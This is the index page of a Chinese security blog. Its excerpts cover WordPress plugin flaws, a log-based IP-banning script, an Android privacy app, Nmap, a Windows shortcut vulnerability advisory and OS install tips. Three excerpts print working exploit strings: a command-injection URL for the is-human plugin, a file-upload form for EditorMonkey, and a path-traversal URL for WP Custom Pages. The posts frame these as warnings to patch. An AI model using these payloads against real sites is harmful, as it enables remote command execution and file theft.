Pray's Blog

Is-human是WordPress的一个发表评论验证插件。 这个插件的漏洞能导致远程命令执行。 以下是BUG原理，各位博友赶快修复。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error 其中，passthru(whoami)这里可以执行任意命令，比如ls，uname等。但uname -a， wget等无法执行，含有空格。需要base64编码。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();e...阅读更多

WordPress插件EditorMonkey存在上传BUG。 用Windows 2003系统的博友请注意了。 这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。 BUG关键字：plugins/editormonkey   EXP： 1 2 3 4 5 <form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post"> Upload a new file:<br> <...阅读更多

以下防止CC攻击主要是过滤访问日志的方法将IP封入防火墙内,将脚本放入cron中十分钟执行一次即可,也可跟据自己的需求进行修改,因为我使用的lighttp做web服务器,所以是读取lighttp访问日志,此脚本同样适用apache服务器: #!/bin/bash /www/MTCC/solution_ip.sh /usr/bin/tail -1000 /var/log/lighttpd/access.log | grep -v 127.0.0.1 | awk '{print $1}' | awk '$1 {++S[$1]} END {for(a in S) print a, S[a]}' | sort -k 2 -n -r | awk '$2&gt;10 {print $1}' &gt; /www/...阅读更多

曾经为大家开发M8 Android的LBE小组发布了旗下Android底层安全软件——LBE隐私卫士的首个正式版本。据LBE小组的拉面介绍，LBE隐私卫士采用其独创的API拦截技术，是Android平台上首款具备底层实时监控与拦截功能，能够防御来自已知和未知各种威胁的安全产品。 同市面上Android安全软件不同，LBE隐私卫士的功能主要定位在隐私防护方面，具备三大独创功能：吸费拦截、隐私防护和网络防火墙。 吸费拦截 LBE隐私卫士能够实时拦截来自应用程序发送短信和拨打电话的请求，并且发出警报。相对...阅读更多

Worepress的一个自定义页面的插件存在远程包含漏洞。 插件名称：WP Custom Pages 版本：0.5.0.1 漏洞如下： http://域名/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 而wordpress的插件少用一份多一份安全。有安装这个版本的请赶快升级新版本。 文章地址:http://blog.nodll.com/2011/04/13/wp-custom-pages-bug/Pray.html 阅读更多

Nmap是一个著名的开源工具，它出现在20世纪90后期。 2003年，在电影《黑客帝国2》中Tritnity曾用Nmap 2.54BETA25版攻击SSH 服务器， 破坏发电厂的安全，Nmap因此受到了普遍关注。 在现实生活中，Nmap主要用于确定网络上的主机，主机提供的服务，以及扫描网络的开放端口等等。 Nmap是安全专家用以映射他们的网络和测试安全漏洞的有价值的工具，有人担心黑客帝国中的情况的出现，因为Nmap也是恶意黑客的利用的工具，被用来查找可以攻击的开放端口。 Nmap（Network Mapper，网络映射器...阅读更多

日前微软发布安全通告，称其正在调查一个几乎涉及全系Windows操作系统的远程代码执行漏洞（CVE编号：CVE-2010- 2568）。该漏洞存在于“Windows Shell”组件中，当受影响系统用户点击或者Windows Shell试图加载经过精心构造的恶意快捷方式图标时，由于Windows Shell没有验证指定的参数，可导致恶意代码在本地运行。 反病毒专家介绍，微软公布了两个临时解决方案，暂未推出正式补丁。电脑用户可采用微软临时解决方法，避免系统遭到利用该漏洞的恶意代码攻击。 临时解决方案一：通过修改...阅读更多

在其它影响因素相同的情况下，简单的解决方案是最安全的。 在开发软件时间，代码写的越多，出现错误的几率也就越大。在统计学上代码行数和错误数量之间是存在简单对应的关系的：代码越多，错误越多。由于很多（不是全部）的错误可以被当作安全方面的脆弱点予以利用，因此，对于单一软件来说系统开发量就可以对安全造成重大影响。 在为软件系统添加功能时，不论需要多少行代码来执行这些功能，都有可能导致错误的出现。这是因为系统中不同功能块的相互作用，有时会产生惊人的效果，...阅读更多

安装新的Windows系统有n种方式，这里，n >= 5。硬盘安装，光盘安装，U盘安装，虚拟光驱安装，还有Ghost安装等等。今天对新手朋友们简要说几句用U盘或者移动硬盘安装Win7的好处。 安装速度快 正常用光盘安装一般20-35分钟可以搞定，但是用USB移动硬盘安装Windows7就更快，一般全新安装一次不超过10分钟。当然，U盘也可以做，只是U盘在拷贝小文件时速度太慢。 方便调整电脑内置硬盘的分区大小 用外接设备安装Windows7的好处就是可以随意重分区电脑里的硬盘，当然，您用光盘安装也...阅读更多

随着网络的应用不断增加，每个人都有一大堆的账号密码。非常幸运的是那些网络上的应用如 Facebook，Gmail，QQ等都会有一个”忘记密码”选项帮您恢复忘记的密码。但如果您的操作系统密码忘了 怎么办呢？您可以会毫不犹豫的说这种事情是不可能发生的，但凡是不怕一万就怕个万一。 我们就假设你在装Ubuntu的求快不在意随便输入一串字符密码后来启动的时候又忘 了，或者比较久没开机 把用户密码给忘了或其他什么原因。这时候您可以首先想的是花几十分钟重装一次系统。但这样...阅读更多